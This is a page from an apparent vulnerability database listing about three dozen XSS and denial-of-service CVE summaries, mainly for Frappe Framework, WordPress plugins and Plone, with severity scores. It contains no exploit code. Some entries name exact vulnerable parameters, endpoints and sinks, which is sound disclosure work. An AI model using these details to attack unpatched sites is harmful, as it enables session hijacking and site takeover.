Stored Cross-Site Scripting in Frappe Framework 17.0.0-dev allows a high-privileged authenticated user to inject persistent malicious scripts into the Number Card dashboard component, which then execute in the browsers of other users who view the affected dashboard. The CVSS 4.0 vector (PR:H/UI:A) confirms exploitation requires admin-level access to plant the payload and a victim's browser interaction to trigger it, limiting realistic blast radius despite the network delivery vector. No public exploit code or CISA KEV listing has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored XSS in Frappe Framework version 17.0.0-dev allows a high-privileged authenticated user to inject malicious JavaScript through the Number Card dashboard component, which subsequently executes in other authenticated users' browser sessions when they view affected dashboards. The CVSS 4.0 score of 4.6 (Medium) reflects the dual constraint of requiring high-privilege credentials to plant the payload and active victim interaction to trigger it - both of which meaningfully limit real-world exploitability. No public exploit code or CISA KEV listing is identified at time of analysis; this was reported by Fluid Attacks.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored Cross-Site Scripting in Frappe Framework 17.0.0-dev allows an authenticated low-privileged user to inject persistent JavaScript payloads via the Notifications > Events panel, which execute in the browser context of any user who subsequently views that panel. The CVSS 4.0 vector confirms subsequent-system scope impact (SC:L/SI:L), meaning the attack targets other users rather than the attacker's own session. No public exploit has been identified and this CVE is not listed in the CISA Known Exploited Vulnerabilities catalog.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored XSS in Frappe Framework 17.0.0-dev's MultiSelectDialog component allows authenticated low-privileged attackers to inject persistent malicious scripts that execute in other users' browsers when the compromised UI element is rendered. Per the CVSS 4.0 vector (PR:L/UI:A/SC:L/SI:L), exploitation requires a valid low-privilege account and active victim interaction, but the scope change to the subsequent system confirms cross-user impact on confidentiality and integrity. No public exploit code and no CISA KEV listing exist at time of analysis; the 17.0.0-dev designation suggests exposure may currently be limited to pre-release or development deployments.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Cross-site scripting in Frappe Framework 17.0.0-dev allows a high-privileged attacker who can modify the Form Dashboard headline to inject malicious JavaScript that executes in the browsers of other users who subsequently view the affected form. The CVSS 4.0 vector (PR:H/UI:A) confirms exploitation is gated behind two significant barriers: attacker must hold high-privilege application credentials and a victim must actively navigate to the injected form. No public exploit code and no active exploitation (CISA KEV) have been identified at the time of analysis; this was reported by Fluid Attacks.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored XSS in Frappe Framework 17.0.0-dev allows a high-privileged attacker to inject persistent malicious scripts into the File View breadcrumb renderer, which then execute in the browsers of other users who navigate to the affected view. The CVSS 4.0 vector (PR:H, UI:A, SC:L/SI:L) confirms that while network delivery is possible, exploitation is constrained by the need for elevated access to inject the payload and victim interaction to trigger it, with impact limited to the subsequent system (victim browser). No public exploit code or CISA KEV listing has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored Cross-Site Scripting in Frappe Framework 17.0.0-dev allows an authenticated low-privileged user to inject persistent malicious scripts via the Desk desktop icon renderer, which then execute in the browsers of other users - including administrators - who subsequently view the affected Desk interface. The vulnerability was reported by Fluid Attacks and carries a CVSS 4.0 score of 4.8 (Medium), reflecting cross-user impact limited to the subsequent-system scope (SC:L/SI:L). No public exploit code or active exploitation has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM This Month

Reflected Cross-Site Scripting in Frappe Framework 17.0.0-dev's dashboard-view component allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser by tricking them into clicking a specially crafted URL. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:A) confirms no authentication is required from the attacker, though victim interaction is mandatory. Impact is confined to the subsequent system (victim browser session), with low integrity and confidentiality consequences; no active exploitation or public POC has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored XSS in Frappe Framework 17.0.0-dev allows high-privileged authenticated attackers to inject persistent malicious scripts via the `frappe.get_avatar` function, which execute in victims' browsers when the crafted content is rendered. The CVSS 4.0 score of 4.6 (Medium) reflects the PR:H requirement to store the payload and UI:A requirement for victim interaction, with impact limited to subsequent systems (other users' sessions). No public exploit or active exploitation has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored Cross-Site Scripting in Frappe Framework 17.0.0-dev allows an authenticated attacker with write access to the Auto Repeat module to inject persistent HTML/JavaScript into the reference_document field via a whitelisted write path, bypassing server-side input controls. When any user opens the affected Auto Repeat form, the injected payload executes in their browser context, enabling session hijacking, credential theft, or unauthorized UI manipulation on behalf of the victim. No public exploit code or confirmed active exploitation (CISA KEV) has been identified at time of analysis; however, the stored (persistent) nature of this XSS makes it more dangerous than reflected variants within shared Frappe deployments.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

Stored XSS in Frappe Framework 17.0.0-dev allows a high-privileged authenticated attacker to inject persistent malicious scripts into the Audit Trail component, which then execute in the browsers of other privileged users who view that trail. The vulnerability arises from improper input neutralization (CWE-79) before HTML rendering in the audit logging subsystem, and is assigned a CVSS 4.0 score of 4.6 reflecting the high-privilege prerequisite and required victim interaction. No public exploit code has been identified and this CVE is not listed in CISA KEV at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 8.2
HIGH This Week

Cross-site scripting in OpenText Access Manager 5.1 through 5.1.2 lets a remote unauthenticated attacker inject script that executes in the browser of a targeted user of this enterprise SSO/access-management platform (CWE-79). Per the vendor-supplied CVSS 4.0 vector the flaw carries high vulnerable-system confidentiality impact (VC:H) but high attack complexity and a specific attack requirement (AC:H/AT:P), yielding a base score of 8.2. No public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Access Manager
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

HTML injection in Hono's JSX server-side rendering engine (versions before 4.12.14) allows network-accessible attackers to corrupt rendered HTML output by supplying malformed attribute names containing characters such as quotes or angle brackets. Applications that pass untrusted external input - query parameters, form data, or other user-controlled values - directly as JSX attribute keys during SSR are affected. No active exploitation has been confirmed and no public exploit code has been identified at time of analysis; however, successful exploitation against vulnerable application patterns can escalate to cross-site scripting if the injected HTML includes event handlers processed by the victim's browser.

XSS Hono
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored XSS in n8n's Form Trigger node allows any authenticated low-privilege user with workflow creation rights to inject persistent malicious scripts that execute for every visitor of a published form. Affects n8n 1.x before 1.123.25 and 2.x from 2.0.0-rc.0 before 2.11.2. No public exploit or active exploitation identified at time of analysis; the CVSS 4.0 score of 5.1 reflects partial CSP mitigation blocking session cookie theft while still permitting form hijacking and phishing against unlimited downstream victims.

XSS N8n
NVD GitHub
EPSS 0% CVSS 1.1
LOW Monitor

Stored XSS in the AWS API key store component of Thinkst Applied Research Canarytokens allows a low-privileged attacker who knows a token's random identifier to inject persistent malicious scripts that execute in a victim's browser when they view the affected token page. Exploitation is constrained by high attack complexity (AC:H), a prerequisite attack requirement (knowledge of a random identifier), low-privilege authentication, and active user interaction - reflected in an extremely low CVSS 4.0 base score of 1.1. No active exploitation is confirmed; however, the CVSS 4.0 vector includes E:P, indicating proof-of-concept exploit code exists.

XSS Docker Canarytokens
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

Stored Cross-Site Scripting in the AI Share & Summarize WordPress plugin (all versions before 2.0.4) allows any user holding a Contributor role or above to inject persistent malicious JavaScript via unsanitized shortcode attributes rendered on pages. When a higher-privileged user such as an Administrator subsequently views the affected page, the payload executes in their browser, enabling session hijacking, credential theft, or unauthorized privileged actions. A publicly available proof-of-concept exploit exists per WPScan, and a vendor-released patch is available in version 2.0.4.

WordPress XSS Ai Share Summarize
NVD WPScan VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the Image Sizes on Demand WordPress plugin (versions ≤ 1.3) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized PHP_SELF server variable in settings.php. Successful exploitation requires social engineering an administrator into clicking a crafted link, after which the injected script executes within the admin's authenticated browser session - enabling session hijacking or unauthorized administrative actions. No public exploit code and no CISA KEV listing have been identified at time of analysis.

XSS WordPress Image Sizes On Demand
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the WP Latest Posts WordPress plugin (versions up to and including 5.0.11) allows authenticated attackers with author-level access to plant persistent JavaScript payloads by crafting malicious image src attributes in post content. The plugin's field() and loop() functions in wplp-front.inc.php extract raw src values via regex and reconstruct HTML img elements or CSS background-image declarations through direct string concatenation, entirely bypassing WordPress's built-in kses sanitization. No public exploit code or CISA KEV listing has been identified at time of analysis; however, the scope change to the victim's browser context enables session hijacking or credential theft against any user who visits an injected page.

XSS WordPress Wp Latest Posts
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Avalon23 Products Filter for WooCommerce (≤1.1.6) allows authenticated Contributors to inject persistent JavaScript via the `avalon23_qr` shortcode's `title` and `fixed_link` attributes, which are concatenated unsanitized into single-quoted HTML attributes by `AVALON23_HELPER::draw_html_item()`. The payload is stored in the WordPress database and executes in the browser of any user who subsequently visits an injected page, enabling session hijacking, credential theft, or unauthorized administrative actions. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV.

XSS WordPress Avalon23 Products Filter For Woocommerce
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Mir Blocks and Shortcodes WordPress plugin (versions up to and including 1.0.0) allows authenticated attackers with contributor-level access to permanently inject arbitrary JavaScript into pages via unsanitized shortcode attributes - specifically the 'title' and 'ready_animation_text' parameters of the msc_stats() rendering function. Any site visitor who loads an injected page executes the attacker's script in their browser, enabling session theft, credential harvesting, or in-page content manipulation. No public exploit or CISA KEV listing is confirmed at time of analysis, but the low privilege requirement (contributor) makes this accessible to a broad class of registered WordPress users.

XSS WordPress Mir Blocks And Shortcodes
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Unauthenticated stored cross-site scripting in the WP Meta SEO WordPress plugin (versions ≤ 4.5.18 by Joomunited) lets remote attackers persist arbitrary JavaScript into the `wp_wpms_links.link_url` database column by sending HTTP requests with a malicious URI to any 404 path. The payload executes in the browser of any administrator who opens the plugin's '404 & Redirects' admin page, enabling session hijacking or admin-on-behalf actions. No public exploit identified at time of analysis; no KEV listing.

PHP XSS WordPress +1
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the EntreDroppers WordPress plugin (all versions through 1.1.2) allows unauthenticated attackers to inject arbitrary JavaScript into victim browsers by embedding script payloads in the URL path-info segment, which PHP reflects unsanitized through the PHP_SELF server variable into the form action attribute at EntreDroppers.php line 223. Successful exploitation requires tricking an authenticated WordPress administrator into clicking a crafted link pointing to the /wp-admin/ context, making this a social-engineering-dependent attack. No public exploit code or active exploitation has been identified at time of analysis; no patch has been confirmed from available data.

PHP XSS WordPress +1
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the Cincopa video and media plug-in for WordPress (versions ≤1.163) allows unauthenticated commenters to inject persistent JavaScript via the [cincopa] shortcode processed by the comment_text filter. Any visitor or administrator viewing the affected post executes the attacker's script in their browser session. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

XSS WordPress Cincopa Video And Media Plug In
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the Email JavaScript Cloak WordPress plugin (versions ≤1.03) allows authenticated contributors and higher to inject arbitrary JavaScript via unsanitized attributes of the plugin's 'email' shortcode. The payload executes in any visitor's browser that renders the affected page, enabling session theft or site defacement. No public exploit identified at time of analysis, and the plugin is not listed in CISA KEV.

XSS WordPress Email Javascript Cloak
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the ARForms WordPress plugin (versions ≤7.1.3) allows unauthenticated remote attackers to inject arbitrary JavaScript via the `value` parameter of the `arf_save_incomplete_form_data` AJAX endpoint, with the payload executing in an administrator's browser when they view the Partial Filled Form Entries dashboard page. No public exploit identified at time of analysis, though Wordfence's disclosure provides enough technical detail to reproduce the injection. Successful exploitation typically leads to admin account takeover and full WordPress site compromise.

XSS WordPress Arforms
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Xpro Addons plugin for WordPress (versions ≤1.7.2) allows authenticated attackers holding author-level or higher roles to permanently embed arbitrary JavaScript via the `custom_attributes` parameter across at least 12 distinct Elementor widget frontend templates. The injected payload executes in the browsers of any user who subsequently visits an affected page, enabling session hijacking, credential theft, or administrative account takeover without further attacker interaction. No public exploit identified at time of analysis, though Wordfence has published source-code-level vulnerability locations across multiple widget layout files.

XSS WordPress Xpro Addons 140 Widgets For Elementor
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Stored cross-site scripting in FlatPress (commits prior to 10be83c) allows unauthenticated remote attackers to inject persistent HTML and JavaScript via the name, URL, and email fields of comment and contact forms. The payloads execute in any viewer's browser - including administrators reviewing comments in the admin panel - and weak URL scheme validation additionally permits javascript: and data: URI injection. No public exploit identified at time of analysis, but the patch and a third-party advisory disclose the affected sinks in detail.

XSS Flatpress
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored cross-site scripting in Fortra File Integrity Monitoring (FIM) versions prior to 9.4.0.1 allows a highly privileged authenticated user to inject persistent script content into node or database configuration fields within the Asset View UI component. When another user subsequently views the affected Asset View page, the stored payload executes in their browser context rather than being safely escaped, enabling session hijacking, credential theft, or unauthorized UI manipulation against that victim. No public exploit code has been identified and this vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog at time of analysis.

XSS Fortra File Integrity Monitoring Fim
NVD VulDB
CRITICAL Act Now

Denial-of-service via malformed iCalendar import in Plone's plone.app.event package, rated 9.1 critical, enables remote disruption of affected Plone installations by submitting a crafted ICS file to the event import endpoint. Disclosed June 23, 2026 as part of a coordinated Plone security release addressing six distinct vulnerabilities across multiple packages. No public exploit code or CISA KEV listing has been identified at time of analysis, though the critical severity rating and co-disclosure of a related icalendar library CVE (CVE-2026-55099) the same week warrant prompt patching.

XSS Denial Of Service RCE
NVD
CRITICAL Act Now

Denial of Service in the collective/icalendar Python library allows attackers to crash or hang applications that process externally supplied iCalendar data. The vulnerability carries a CVSS score of 7.5 High and affects Plone CMS deployments as well as any Python application using the library to parse .ics input. No public exploit code has been identified at time of analysis, and the issue is not listed in CISA KEV.

XSS Denial Of Service RCE
NVD
CRITICAL Act Now

Denial of service in Plone's RSS feed portlet component (plone.app.portlets) allows an attacker to exhaust server resources by supplying or triggering the parsing of a maliciously crafted RSS/Atom feed, rendering the Plone application unavailable. Disclosed June 23, 2026 as part of a coordinated Plone security release, the issue carries a critical severity rating of 9.1. No public exploit code or CISA KEV listing has been identified at time of analysis.

XSS Denial Of Service RCE
NVD
CRITICAL Act Now

Stored cross-site scripting in Plone CMS enables persistent script injection by spoofing file MIME types within the plone.app.textfield and plone.restapi packages, announced June 5, 2026. An attacker with content-upload access can craft a file whose declared MIME type bypasses Plone's content-type enforcement, causing browsers to render the payload as HTML or JavaScript when other users access the stored content. No public exploit code or CISA KEV listing has been identified at time of analysis; the moderate severity rating (4.3) reflects the stored persistence risk offset by the upload-privilege requirement.

XSS Denial Of Service RCE
NVD
EPSS 0% CVSS 9.6
CRITICAL Act Now

Reflected cross-site scripting in Immich (commits 4ffa26c9 through pre-4eb1003) allows a single-click account takeover of any authenticated user by abusing the unvalidated continue query parameter on /auth/login, which is passed directly to SvelteKit's redirect() without scheme or origin checks. The payload executes attacker-controlled JavaScript inside Immich's origin and uses the victim's session to mint an all-permission API key, yielding persistent compromise. No public exploit identified at time of analysis, but the upstream fix commit and a detailed GHSA advisory describe the flaw clearly enough to derive a working PoC.

XSS Immich
NVD GitHub
EPSS 1% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in Gogs's Jupyter notebook (.ipynb) preview allows any registered user to inject arbitrary JavaScript via `data:text/html` URIs that survive the bluemonday sanitization pipeline, affecting all versions prior to 0.14.3. The `POST /-/api/sanitize_ipynb` endpoint uses `p.AllowURLSchemes("data")` without MIME-type gating, unlike the safer `IsSafeDataURI` validator used elsewhere in the codebase, and carries no authentication middleware - making it reachable by any account holder. A proof-of-concept is publicly documented in GHSA-3w28-36p9-w929; no CISA KEV listing or EPSS data is available at time of analysis.

XSS
NVD GitHub
Prev Page 7 of 432 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
38825

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy